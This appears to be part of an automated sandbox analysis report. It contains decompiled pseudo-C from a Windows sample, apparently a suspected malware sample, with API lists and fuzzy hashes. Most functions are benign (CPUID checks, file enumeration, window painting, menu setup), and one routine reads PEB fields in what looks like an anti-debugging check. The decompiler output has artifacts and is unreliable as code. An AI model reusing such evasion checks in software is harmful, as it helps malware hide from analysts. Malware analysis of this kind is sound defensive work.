    0x00000000
    0x00000000
    0x00000000
    0x001b538a
    0x001b538c
    0x001b538c
    0x001b5392
    0x001b5398
    0x001b53b4
    0x001b53b5
    0x001b53bb
    0x001b53c7
    0x001b53ca
    0x001b53cc
    0x001b53d3
    0x001b53e8
    0x001b53ed
    0x001b53f7
    0x001b5407
    0x001b540d
    0x001b540e
    0x001b5415
    0x001b5434
    0x001b5443
    0x001b5448
    0x001b544b
    0x001b5453
    0x001b54a2
    0x001b54a8
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x001b5455
    0x001b545d
    0x001b5467
    0x001b5467
    0x001b546d
    0x001b5471
    0x001b5477
    0x001b547c
    0x001b5497
    0x001b549c
    0x001b547f
    0x001b5485
    0x001b53ef
    0x001b53ef
    0x00000000
    0x001b53ef
    0x001b539a
    0x001b539a
    0x001b539f
    0x00000000
    0x001b53a1
    0x001b53a1
    0x001b53a2
    0x001b53a4
    0x001b53a7
    0x001b53ac
    0x001b539f
    0x001b54ae
    0x001b54b1
    0x001b54b2
    0x001b54b5
    0x001b54bc
    0x00000000
    0x00000000
    0x00000000
    0x001b52ee
    0x001b52c1
    0x001b52c3
    0x001b52c4
    0x001b52c7
    0x001b52c7

    APIs
      • Part of subcall function 001B4871: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,001B278A,00000001,00000364,00000000,00000007,000000FF,?,?,001B47E9,001B36F8), ref: 001B48B2
    • FindFirstFileExW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 001B53E2
    • FindNextFileW.KERNEL32(00000000,?), ref: 001B545D
    • FindClose.KERNEL32(00000000), ref: 001B547F
    Memory Dump Source
    • Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd
    Similarity
    • API ID: Find$File$AllocateCloseFirstHeapNext
    • String ID:
    • API String ID: 2963102669-0
    • Opcode ID: 04f1538bfe1691fd5d9a280a14cabe98eb25b6de531da95fd037b4305acebd24
    • Instruction ID: 2fbccd032348f1c7a38bf63a595ddec13e865b1119f00ca927515a7bf169b3c8
    • Opcode Fuzzy Hash: 04f1538bfe1691fd5d9a280a14cabe98eb25b6de531da95fd037b4305acebd24
    • Instruction Fuzzy Hash: 6D410B72600A09AFDB14AFA8DC85FFFB3ABEF94354F144159F81697241EB709D008650
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 88%
    			E001AD945(signed int __edx) {
    				signed int _v8;
    				signed int _v12;
    				signed int _v16;
    				signed int _v20;
    				signed int _v24;
    				signed int _v28;
    				signed int _v32;
    				signed int _v36;
    				signed int _v40;
    				intOrPtr _t60;
    				signed int _t61;
    				signed int _t62;
    				signed int _t63;
    				signed int _t66;
    				signed int _t67;
    				signed int _t73;
    				intOrPtr _t74;
    				intOrPtr _t75;
    				intOrPtr* _t77;
    				signed int _t78;
    				intOrPtr* _t82;
    				signed int _t85;
    				signed int _t90;
    				intOrPtr* _t93;
    				signed int _t96;
    				signed int _t99;
    				signed int _t104;
    
    				_t90 = __edx;
    				 *0x1c5aa0 =  *0x1c5aa0 & 0x00000000;
    				 *0x1c4058 =  *0x1c4058 | 0x00000001;
    				if(IsProcessorFeaturePresent(0xa) == 0) {
    					L23:
    					return 0;
    				}
    				_v20 = _v20 & 0x00000000;
    				_push(_t74);
    				_t93 =  &_v40;
    				asm("cpuid");
    				_t75 = _t74;
    				 *_t93 = 0;
    				 *((intOrPtr*)(_t93 + 4)) = _t74;
    				 *((intOrPtr*)(_t93 + 8)) = 0;
    				 *(_t93 + 0xc) = _t90;
    				_v16 = _v40;
    				_v8 = _v28 ^ 0x49656e69;
    				_v12 = _v32 ^ 0x6c65746e;
    				_push(_t75);
    				asm("cpuid");
    				_t77 =  &_v40;
    				 *_t77 = 1;
    				 *((intOrPtr*)(_t77 + 4)) = _t75;
    				 *((intOrPtr*)(_t77 + 8)) = 0;
    				 *(_t77 + 0xc) = _t90;
    				if((_v8 | _v12 | _v36 ^ 0x756e6547) != 0) {
    					L9:
    					_t96 =  *0x1c5aa4; // 0x2
    					L10:
    					_t85 = _v32;
    					_t60 = 7;
    					_v8 = _t85;
    					if(_v16 < _t60) {
    						_t78 = _v20;
    					} else {
    						_push(_t77);
    						asm("cpuid");
    						_t82 =  &_v40;
    						 *_t82 = _t60;
    						 *((intOrPtr*)(_t82 + 4)) = _t77;
    						 *((intOrPtr*)(_t82 + 8)) = 0;
    						_t85 = _v8;
    						 *(_t82 + 0xc) = _t90;
    						_t78 = _v36;
    						if((_t78 & 0x00000200) != 0) {
    							 *0x1c5aa4 = _t96 | 0x00000002;
    						}
    					}
    					_t61 =  *0x1c4058; // 0x6f
    					_t62 = _t61 | 0x00000002;
    					 *0x1c5aa0 = 1;
    					 *0x1c4058 = _t62;
    					if((_t85 & 0x00100000) != 0) {
    						_t63 = _t62 | 0x00000004;
    						 *0x1c5aa0 = 2;
    						 *0x1c4058 = _t63;
    						if((_t85 & 0x08000000) != 0 && (_t85 & 0x10000000) != 0) {
    							asm("xgetbv");
    							_v24 = _t63;
    							_v20 = _t90;
    							_t104 = 6;
    							if((_v24 & _t104) == _t104) {
    								_t66 =  *0x1c4058; // 0x6f
    								_t67 = _t66 | 0x00000008;
    								 *0x1c5aa0 = 3;
    								 *0x1c4058 = _t67;
    								if((_t78 & 0x00000020) != 0) {
    									 *0x1c5aa0 = 5;
    									 *0x1c4058 = _t67 | 0x00000020;
    									if((_t78 & 0xd0030000) == 0xd0030000 && (_v24 & 0x000000e0) == 0xe0) {
    										 *0x1c4058 =  *0x1c4058 | 0x00000040;
    										 *0x1c5aa0 = _t104;
    									}
    								}
    							}
    						}
    					}
    					goto L23;
    				}
    				_t73 = _v40 & 0x0fff3ff0;
    				if(_t73 == 0x106c0 || _t73 == 0x20660 || _t73 == 0x20670 || _t73 == 0x30650 || _t73 == 0x30660 || _t73 == 0x30670) {
    					_t99 =  *0x1c5aa4; // 0x2
    					_t96 = _t99 | 0x00000001;
    					 *0x1c5aa4 = _t96;
    					goto L10;
    				} else {
    					goto L9;
    				}
    			}






























    0x001ad945
    0x001ad948
    0x001ad952
    0x001ad963
    0x001adb15
    0x001adb18
    0x001adb18
    0x001ad969
    0x001ad96f
    0x001ad974
    0x001ad978
    0x001ad97c
    0x001ad97e
    0x001ad980
    0x001ad983
    0x001ad988
    0x001ad991
    0x001ad9a2
    0x001ad9ad
    0x001ad9b3
    0x001ad9b4
    0x001ad9ba
    0x001ad9bd
    0x001ad9c7
    0x001ad9ca
    0x001ad9cd
    0x001ad9d0
    0x001ada15
    0x001ada15
    0x001ada1b
    0x001ada1b
    0x001ada20
    0x001ada21
    0x001ada27
    0x001ada59
    0x001ada29
    0x001ada2b
    0x001ada2c
    0x001ada32
    0x001ada35
    0x001ada37
    0x001ada3a
    0x001ada3d
    0x001ada40
    0x001ada43
    0x001ada4c
    0x001ada51
    0x001ada51
    0x001ada4c
    0x001ada5c
    0x001ada61
    0x001ada64
    0x001ada6e
    0x001ada79
    0x001ada7f
    0x001ada82
    0x001ada8c
    0x001ada97
    0x001adaa3
    0x001adaa6
    0x001adaa9
    0x001adab4
    0x001adab9
    0x001adabb
    0x001adac0
    0x001adac3
    0x001adacd
    0x001adad5
    0x001adada
    0x001adae4
    0x001adaf2
    0x001adb05
    0x001adb0c
    0x001adb0c
    0x001adaf2
    0x001adad5
    0x001adab9
    0x001ada97
    0x00000000
    0x001adb14
    0x001ad9d5
    0x001ad9df
    0x001ada04
    0x001ada0a
    0x001ada0d
    0x00000000
    0x00000000
    0x00000000
    0x00000000

    APIs
    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 001AD95B
    Memory Dump Source
    • Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd
    Similarity
    • API ID: FeaturePresentProcessor
    • String ID:
    • API String ID: 2325560087-0
    • Opcode ID: 5d2a01c0e4107a72b5d30457386b4c40988fa1045f42c882e9c927bab2e4482f
    • Instruction ID: c7e4921454e38c1496c52337b27b76055855d0bc7e421996745efe15dc640d1a
    • Opcode Fuzzy Hash: 5d2a01c0e4107a72b5d30457386b4c40988fa1045f42c882e9c927bab2e4482f
    • Instruction Fuzzy Hash: C2519475A04A058FDB14CF65E8C6BAABBF1FB45310F258129E416EBA50D374ED90CF50
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd
    Similarity
    • API ID: KeyboardState
    • String ID:
    • API String ID: 1724228437-0
    • Opcode ID: 5735bac817b401af96b779d19eb6c268aee1ca7e52a60b009da0257292257a3f
    • Instruction ID: 8cfa2a5e12be504cc2b316ab260ddb3ba3c92ab8979b85d1ec4b9436bab9e7fc
    • Opcode Fuzzy Hash: 5735bac817b401af96b779d19eb6c268aee1ca7e52a60b009da0257292257a3f
    • Instruction Fuzzy Hash: 9131AA75A14248AFEB51CFA8C596BAD7BF0FB01311F1844A1E4D4DB292C338DB90DB51
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E001B258B() {
    				signed int _t3;
    
    				_t3 = GetProcessHeap();
    				 *0x1c62dc = _t3;
    				return _t3 & 0xffffff00 | _t3 != 0x00000000;
    			}




    0x001b258b
    0x001b2593
    0x001b259b

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd
    Similarity
    • API ID: HeapProcess
    • String ID:
    • API String ID: 54951025-0
    • Opcode ID: fe429d73a1766d118c9d258ea33ba8a83b55d005c1360f1cfb01d1641427dfdd
    • Instruction ID: 2cfd7e43f5e6a1b060a29ef0d934c00b0ea02ddd39927653697a738e4699ed8d
    • Opcode Fuzzy Hash: fe429d73a1766d118c9d258ea33ba8a83b55d005c1360f1cfb01d1641427dfdd
    • Instruction Fuzzy Hash: 97A011302022008F83008F32AA08A083EA8AB82280B088828A002C8820EA20C0E0EF02
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E001B418D(void* __ecx) {
    				char _v8;
    				intOrPtr _t7;
    				char _t13;
    
    				_t13 = 0;
    				_v8 = 0;
    				_t7 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
    				_t16 =  *((intOrPtr*)(_t7 + 8));
    				if( *((intOrPtr*)(_t7 + 8)) < 0) {
    					L2:
    					_t13 = 1;
    				} else {
    					E001B2329(_t16,  &_v8);
    					if(_v8 != 1) {
    						goto L2;
    					}
    				}
    				return _t13;
    			}






    0x001b419a
    0x001b419c
    0x001b419f
    0x001b41a2
    0x001b41a5
    0x001b41b6
    0x001b41b8
    0x001b41a7
    0x001b41ab
    0x001b41b4
    0x00000000
    0x00000000
    0x001b41b4
    0x001b41bd

    Memory Dump Source
    • Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: d2ad5c32dc7646e2450354e1ffd7f211a2991837c3e3f6e2b6b4411862f7e83d
    • Instruction ID: 80d6959353c36baaaba2738424b149c134c173e6d13ca82b67aff4cc4656fb32
    • Opcode Fuzzy Hash: d2ad5c32dc7646e2450354e1ffd7f211a2991837c3e3f6e2b6b4411862f7e83d
    • Instruction Fuzzy Hash: 25E04632911228EBCB15DB8C890498AB2FCEB59B00B11859AF501D3211C370EE40C7D0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E001B009E(void* __ecx, void* __eflags) {
    
    				if(E001B418D(__ecx) == 1 || ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) != 0) {
    					return 0;
    				} else {
    					return 1;
    				}
    			}



    0x001b00a6
    0x001b00bf
    0x001b00ba
    0x001b00bc
    0x001b00bc

    Memory Dump Source
    • Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: a70851e5609c448e8c58597b19ee992f77326b5201e67141dc45e8f64a1dd04d
    • Instruction ID: 6803abb51c5154ada3ab1557e547850481250d0fc8d5859c7edf707db979c83c
    • Opcode Fuzzy Hash: a70851e5609c448e8c58597b19ee992f77326b5201e67141dc45e8f64a1dd04d
    • Instruction Fuzzy Hash: 6CC08C34000F0057CE2AAE1482713E67358A3A5BC2F80048DD4128BB42D71FAC82DA52
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    C-Code - Quality: 48%
    			E001ABF30(struct HWND__* _a4, int _a8, int _a12, signed int _a16) {
    				long _v12;
    				long _v16;
    				struct tagPAINTSTRUCT _v80;
    				struct tagRECT _v96;
    				intOrPtr _v100;
    				intOrPtr _v104;
    				signed int _v108;
    				signed int _v112;
    				signed int _v116;
    				signed int _v120;
    				void* _v124;
    				void* _v128;
    				intOrPtr _v132;
    				long _v136;
    				signed int _v140;
    				void* _v144;
    				struct tagRECT _v156;
    				intOrPtr _v160;
    				signed int _v164;
    				signed int _v168;
    				signed int _v172;
    				void* _v176;
    				void* _v180;
    				void* _v184;
    				signed int* _v188;
    				void* _v204;
    				RECT* _v208;
    				intOrPtr _v212;
    				signed int _v216;
    				signed int _v228;
    				signed int _v232;
    				signed int _v240;
    				intOrPtr _v244;
    				void* _v260;
    				intOrPtr _v264;
    				intOrPtr _v268;
    				intOrPtr _v276;
    				signed int _v280;
    				void* _v292;
    				void* _v296;
    				int _t176;
    				long _t186;
    				struct HBRUSH__* _t208;
    				long _t214;
    				void* _t218;
    				intOrPtr _t236;
    				void* _t245;
    				void* _t326;
    				struct HDC__** _t330;
    				struct HDC__** _t332;
    				struct HDC__** _t336;
    				struct HDC__** _t337;
    				struct HDC__** _t338;
    				struct HDC__** _t341;
    				struct HDC__** _t342;
    				void* _t343;
    				struct HDC__** _t344;
    
    				_t176 = _a8;
    				_v160 = _t176;
    				if(_t176 == 0xf) {
    					BeginPaint(_a4,  &_v80);
    					GetClientRect(_a4,  &_v96);
    					asm("cdq");
    					_v120 = _v96.right / 8;
    					_t186 = GetWindowLongW(GetParent(_a4), 8);
    					_t330 = _t326 - 0xfffffffffffffff4;
    					_v16 = _t186;
    					_v116 = 0;
    					while(_v116 < 0x10) {
    						asm("cdq");
    						_v168 = _v116 / 8;
    						asm("cdq");
    						_v108 = _v168 * _v96.bottom / 2;
    						_v164 = _v108;
    						asm("cdq");
    						_v100 = _v164 + _v96.bottom / 2;
    						_v112 = (_v116 & 0x00000007) * _v120;
    						_v104 = _v112 + _v120;
    						_t208 = CreateSolidBrush( *(_v16 + 4 + _v116 * 4));
    						_t332 = _t330 - 4;
    						_v124 = _t208;
    						 *_t332 = _v80.hdc;
    						_v188 =  &_v112;
    						_v184 = _v124;
    						FillRect(??, ??, ??);
    						DeleteObject(_v124);
    						_t214 = GetWindowLongW(_a4, 0);
    						_t330 = _t332;
    						if(_t214 == _v116) {
    							_v132 = 2;
    							_t218 = SelectObject(_v80.hdc, GetStockObject(6));
    							_t336 = _t330 - 0xfffffffffffffffc;
    							_v128 = _t218;
    							_v104 = _v104 + 0xffffffff;
    							_v100 = _v100 + 0xffffffff;
    							while(1) {
    								 *_t336 = _v80.hdc;
    								_v216 = _v112;
    								_v212 = _v100;
    								_v208 = 0;
    								MoveToEx(??, ??, ??, ??);
    								_t337 = _t336 - 0x10;
    								 *_t337 = _v80.hdc;
    								_v232 = _v112;
    								_v228 = _v108;
    								LineTo(??, ??, ??);
    								_t338 = _t337 - 0xc;
    								 *_t338 = _v80.hdc;
    								_v244 = _v104;
    								_v240 = _v108;
    								LineTo(??, ??, ??);
    								SelectObject(_v80.hdc, GetStockObject(7));
    								_t341 = _t338;
    								 *_t341 = _v80.hdc;
    								_v268 = _v104;
    								_v264 = _v100;
    								LineTo(??, ??, ??);
    								_t342 = _t341 - 0xc;
    								 *_t342 = _v80.hdc;
    								_v280 = _v112;
    								_v276 = _v100;
    								LineTo(??, ??, ??);
    								_t343 = _t342 - 0xc;
    								_t236 = _v132 + 0xffffffff;
    								_v132 = _t236;
    								if(_t236 == 0) {
    									break;
    								}
    								_v112 = _v112 + 1;
    								_v108 = _v108 + 1;
    								_v104 = _v104 + 0xffffffff;
    								_v100 = _v100 + 0xffffffff;
    								_t245 = GetStockObject(6);
    								_t344 = _t343 - 4;
    								 *_t344 = _v80.hdc;
    								_v296 = _t245;
    								SelectObject(??, ??);
    								_t336 = _t344 - 8;
    							}
    							SelectObject(_v80, _v128);
    							_t330 = _t343 - 8;
    						}
    						_v116 = _v116 + 1;
    					}
    					EndPaint(_a4,  &_v80);
    					goto L17;
    				} else {
    					if(_v160 == 0x201) {
    						GetClientRect(_a4,  &_v156);
    						asm("cdq");
    						_v140 = _v156.right / 8;
    						_v172 = _a16 >> 0x00000010 & 0xffff;
    						asm("cdq");
    						_t262 =  >=  ? 8 : 0;
    						_v136 =  >=  ? 8 : 0;
    						asm("cdq");
    						_v136 = (_a16 & 0xffff) / _v140 + _v136;
    						SetWindowLongW(_a4, 0, _v136);
    						InvalidateRect(GetDlgItem(GetParent(_a4), 0x206), 0, 0);
    						InvalidateRect(_a4, 0, 0);
    						L17:
    						_v12 = 0;
    					} else {
    						_v12 = DefWindowProcW(_a4, _a8, _a12, _a16);
    					}
    				}
    				return _v12;
    			}




























































    0x001abf46
    0x001abf49
    0x001abf52
    0x001abf80
    0x001abf96
    0x001abfa7
    0x001abfaa
    0x001abfc7
    0x001abfcd
    0x001abfd0
    0x001abfd3
    0x001abfda
    0x001abfec
    0x001abfef
    0x001abffd
    0x001ac00b
    0x001ac011
    0x001ac01f
    0x001ac02c
    0x001ac039
    0x001ac042
    0x001ac052
    0x001ac058
    0x001ac05b
    0x001ac067
    0x001ac06a
    0x001ac06e
    0x001ac072
    0x001ac081
    0x001ac09a
    0x001ac0a0
    0x001ac0a6
    0x001ac0ac
    0x001ac0cd
    0x001ac0d3
    0x001ac0d6
    0x001ac0df
    0x001ac0e8
    0x001ac0eb
    0x001ac0f6
    0x001ac0f9
    0x001ac0fd
    0x001ac101
    0x001ac109
    0x001ac10f
    0x001ac11b
    0x001ac11e
    0x001ac122
    0x001ac126
    0x001ac12c
    0x001ac138
    0x001ac13b
    0x001ac13f
    0x001ac143
    0x001ac166
    0x001ac16c
    0x001ac178
    0x001ac17b
    0x001ac17f
    0x001ac183
    0x001ac189
    0x001ac195
    0x001ac198
    0x001ac19c
    0x001ac1a0
    0x001ac1a6
    0x001ac1ac
    0x001ac1af
    0x001ac1b5
    0x00000000
    0x00000000
    0x001ac1c6
    0x001ac1cf
    0x001ac1d8
    0x001ac1e1
    0x001ac1eb
    0x001ac1f1
    0x001ac1f7
    0x001ac1fa
    0x001ac1fe
    0x001ac204
    0x001ac204
    0x001ac219
    0x001ac21f
    0x001ac21f
    0x001ac22d
    0x001ac22d
    0x001ac242
    0x00000000
    0x001abf58
    0x001abf68
    0x001ac260
    0x001ac274
    0x001ac277
    0x001ac28b
    0x001ac29c
    0x001ac2b0
    0x001ac2b3
    0x001ac2c4
    0x001ac2d1
    0x001ac2f1
    0x001ac332
    0x001ac353
    0x001ac38d
    0x001ac38d
    0x001abf6e
    0x001ac385
    0x001ac385
    0x001abf68
    0x001ac39f

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd
    Similarity
    • API ID: Rect$Window$LongObject$ClientInvalidateParent$BeginBrushCreateDeleteFillItemPaintProcSelectSolidStock
    • String ID:
    • API String ID: 88183673-0
    • Opcode ID: 648c3c5b20c2e646761c65eaa1ae135d137284993cdc408e60f1d5826e13ec20
    • Instruction ID: 0035cd84869abd6258fc5dd75dfbd2fea8f2e8e19c63995ed2fc223d21bc5cf9
    • Opcode Fuzzy Hash: 648c3c5b20c2e646761c65eaa1ae135d137284993cdc408e60f1d5826e13ec20
    • Instruction Fuzzy Hash: D6D17FB59043089FCB14EFA8D589A9DBBF1BF49300F10892DE899DB351DB349998CF46
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    C-Code - Quality: 49%
    			E001AAE30(struct HMENU__* _a4, intOrPtr _a8) {
    				int _v8;
    				struct HINSTANCE__* _v12;
    				struct HMENU__* _v16;
    				short _v528;
    				void* _v536;
    				void* _v540;
    				void* _v544;
    				int _v548;
    				int _v552;
    				int _v556;
    				int _v560;
    				int _v564;
    				int _v568;
    				int _v572;
    				WCHAR* _v576;
    				int _v580;
    				struct HINSTANCE__* _t129;
    				int _t131;
    				int _t135;
    				int _t139;
    				int _t143;
    				int _t147;
    				int _t151;
    				int _t155;
    				int _t159;
    				int _t163;
    				void* _t199;
    				void* _t200;
    				void* _t218;
    				struct HINSTANCE__** _t225;
    				struct HMENU__** _t226;
    
    				_t129 = GetModuleHandleW(0);
    				_t200 = _t199 - 4;
    				_v12 = _t129;
    				if(_a4 != 0) {
    					_v16 = CreateMenu();
    					if(_v16 != 0) {
    						_t131 =  &_v528;
    						_v548 = _t131;
    						0xffda0000();
    						LoadStringW(_v12, 0x110,  &_v528, _t131);
    						InsertMenuW(_v16, 0xffffffff, 0x400, 0x110,  &_v528);
    						_t135 =  &_v528;
    						_v552 = _t135;
    						0xffda0000();
    						LoadStringW(_v12, 0x111,  &_v528, _t135);
    						InsertMenuW(_v16, 0xffffffff, 0x400, 0x111,  &_v528);
    						_t139 =  &_v528;
    						_v556 = _t139;
    						0xffda0000();
    						LoadStringW(_v12, 0x112,  &_v528, _t139);
    						InsertMenuW(_v16, 0xffffffff, 0x400, 0x112,  &_v528);
    						_t143 =  &_v528;
    						_v560 = _t143;
    						0xffda0000();
    						LoadStringW(_v12, 0x113,  &_v528, _t143);
    						InsertMenuW(_v16, 0xffffffff, 0x400, 0x113,  &_v528);
    						_t147 =  &_v528;
    						_v564 = _t147;
    						0xffda0000();
    						LoadStringW(_v12, 0x114,  &_v528, _t147);
    						InsertMenuW(_v16, 0xffffffff, 0x400, 0x114,  &_v528);
    						_t151 =  &_v528;
    						_v568 = _t151;
    						0xffda0000();
    						LoadStringW(_v12, 0x115,  &_v528, _t151);
    						InsertMenuW(_v16, 0xffffffff, 0x400, 0x115,  &_v528);
    						_t218 = _t200 - 0xffffffffffffff18;
    						if(_a8 != 0) {
    							InsertMenuW(_a4, 0xffffffff, 0xc00, 0, 0);
    							_t218 = _t218 - 0x14;
    						}
    						_t155 =  &_v528;
    						_v572 = _t155;
    						0xffda0000();
    						LoadStringW(_v12, 0x100,  &_v528, _t155);
    						InsertMenuW(_a4, 0xffffffff, 0x410, _v16,  &_v528);
    						_t159 =  &_v528;
    						_v576 = _t159;
    						0xffda0000();
    						LoadStringW(_v12, 0x101,  &_v528, _t159);
    						InsertMenuW(_a4, 0xffffffff, 0x400, 0x101,  &_v528);
    						_t163 =  &_v528;
    						_v580 = _t163;
    						0xffda0000();
    						_t225 = _t218 - 0xffffffffffffffb4;
    						 *_t225 = _v12;
    						_v580 = 0x102;
    						_v576 =  &_v528;
    						_v572 = _t163;
    						LoadStringW(??, ??, ??, ??);
    						_t226 = _t225 - 0x10;
    						 *_t226 = _a4;
    						_v580 = 0xffffffff;
    						_v576 = 0x400;
    						_v572 = 0x102;
    						_v568 =  &_v528;
    						InsertMenuW(??, ??, ??, ??, ??);
    						_t200 = _t226 - 0x14;
    						_v8 = 1;
    					} else {
    						_v8 = 0;
    					}
    				} else {
    					_v8 = 0;
    				}
    				return _v8;
    			}


































    0x001aae48
    0x001aae4e
    0x001aae51
    0x001aae58
    0x001aae70
    0x001aae77
    0x001aae89
    0x001aae8f
    0x001aae92
    0x001aaeb6
    0x001aaee7
    0x001aaef0
    0x001aaef6
    0x001aaef9
    0x001aaf1d
    0x001aaf4e
    0x001aaf57
    0x001aaf5d
    0x001aaf60
    0x001aaf84
    0x001aafb5
    0x001aafbe
    0x001aafc4
    0x001aafc7
    0x001aafeb
    0x001ab01c
    0x001ab025
    0x001ab02b
    0x001ab02e
    0x001ab052
    0x001ab083
    0x001ab08c
    0x001ab092
    0x001ab095
    0x001ab0b9
    0x001ab0ea
    0x001ab0f0
    0x001ab0f7
    0x001ab125
    0x001ab12b
    0x001ab12b
    0x001ab12e
    0x001ab134
    0x001ab137
    0x001ab15b
    0x001ab18b
    0x001ab194
    0x001ab19a
    0x001ab19d
    0x001ab1c1
    0x001ab1f2
    0x001ab1fb
    0x001ab201
    0x001ab204
    0x001ab209
    0x001ab215
    0x001ab218
    0x001ab220
    0x001ab224
    0x001ab228
    0x001ab22e
    0x001ab23a
    0x001ab23d
    0x001ab245
    0x001ab24d
    0x001ab255
    0x001ab259
    0x001ab25f
    0x001ab262
    0x001aae7d
    0x001aae7d
    0x001aae7d
    0x001aae5e
    0x001aae5e
    0x001aae5e
    0x001ab273

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd
    Similarity
    • API ID: CreateHandleMenuModule
    • String ID:
    • API String ID: 4123625242-0
    • Opcode ID: ea3a66fbc2c6f8985ea681114caf609c630cbdb3dd6f19f3c14c1d46ffd311f9
    • Instruction ID: 72f5fcade86e2581983ccb6c9e03ee0762db79734dc77601f4717d6a4453a3f8
